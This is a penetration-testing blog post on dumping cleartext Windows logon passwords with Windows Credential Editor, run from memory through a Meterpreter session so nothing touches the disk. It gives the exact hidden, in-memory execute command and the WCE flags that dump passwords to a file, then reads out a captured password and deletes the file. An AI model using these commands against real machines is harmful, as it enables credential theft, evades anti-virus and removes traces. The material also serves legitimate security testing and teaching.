Dumping Clear Text Passwords

If you haven’t heard, there’s a tool that was released a little over a year now, with little fan fair, that can dump all logged on credentials in clear text. It’s called mimikatz. Passing the Hash is fun, but you can’t beat a good clear text password. Am I right? You can download the executable and dependent DLL from Benjamin’s (the author) site, as well as view a detailed explanation of how it works from his presentation at PHDays 2012. I figured I would finally check this tool out and see what it has to offer. A little Googling around and I found a post on PaulDotCom detailing how to upload and execute the tool through a Meterpreter session. One potential problem with this method is that it can easily be stopped by anti-virus as soon as it hits the disk. Mubix is currently working on a solution to implement the function of mimikatz directly into the Metasploit Framework. I think everyone looks forward to this addition. In the meantime, there is another way to dump clear text passwords within a Meterpreter session without ever touching the disk. First, Hernan Ochoa from Amplia Security has updated his tool, Windows Credential Editor (WCE), to also dump clear text passwords. It’s currently in beta, and hasn’t been added to the BackTrack repository yet, so we’ll have to download it from Amplia Security’s site directly. Next, all we need to do is use Meterpreter’s “execute” function to inject our executable directly into memory of the remote machine and run it to dump the passwords for us. Egyp7, one of the Metasploit Framework developers, wrote a post a couple of months ago showing us just how to do this. Let’s look at our Meterpreter “execute” options:

meterpreter > execute
Usage: execute -f file [options]

Executes a command on the remote machine.


-H        Create the process hidden from view.
-a <opt>  The arguments to pass to the command.
-c        Channelized I/O (required for interaction).
-d <opt>  The 'dummy' executable to launch when using -m.
-f <opt>  The executable command to run.
-h        Help menu.
-i        Interact with the process after creating it.
-k        Execute process on the meterpreters current desktop
-m        Execute from memory.
-s <opt>  Execute process in a given session as the session user
-t        Execute process with currently impersonated thread token

And here are our options for WCE:

root@bt:/pentest/passwords/wce/beta# wine wce.exe -h
fixme:heap:HeapSetInformation (nil) 1 (nil) 0
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa ([email protected])
Use -h for help.
-l        List logon sessions and NTLM credentials (default).
-s        Changes NTLM credentials of current logon session.
          Parameters: <UserName>:<DomainName>:<LMHash>:<NTHash>.
-r        Lists logon sessions and NTLM credentials indefinitely.
          Refreshes every 5 seconds if new sessions are found.
          Optional: -r<refresh interval>.
-c        Run <cmd> in a new session with the specified NTLM credentials.
          Parameters: <cmd>.
-e        Lists logon sessions NTLM credentials indefinitely.
          Refreshes every time a logon event occurs.
-o        saves all output to a file.
          Parameters: <filename>.
-i        Specify LUID instead of use current logon session.
          Parameters: <luid>.
-d        Delete NTLM credentials from logon session.
          Parameters: <luid>.
-a        Use Addresses.
          Parameters: <addresses>
-f        Force 'safe mode'.
-g        Generate LM & NT Hash.
          Parameters: <password>.
-K        Dump Kerberos tickets to file (unix & 'windows wce' format)
-k        Read Kerberos tickets from file and insert into Windows cache
-w        Dump cleartext passwords stored by the digest authentication package
-v        verbose output.

We’re simply going to use Meterpreter’s “-H” option to create a hidden process, “-m” to execute the process from memory, and the “-a” option to send the arguments to WCE that are needed to dump the clear text passwords and output them to a file.

meterpreter > execute -H -m -f /pentest/passwords/wce/beta/wce.exe -a "-w -o output.txt"
Process 2900 created.
meterpreter > cat output.txt

NETWORK SERVICE\WORKGROUP:Supercalifragilisticexpialidocious
meterpreter > del output.txt

Wow, I would have never guessed that password…

<Update: Dumping Clear Text Passwords (Revisited)>

Comments are closed.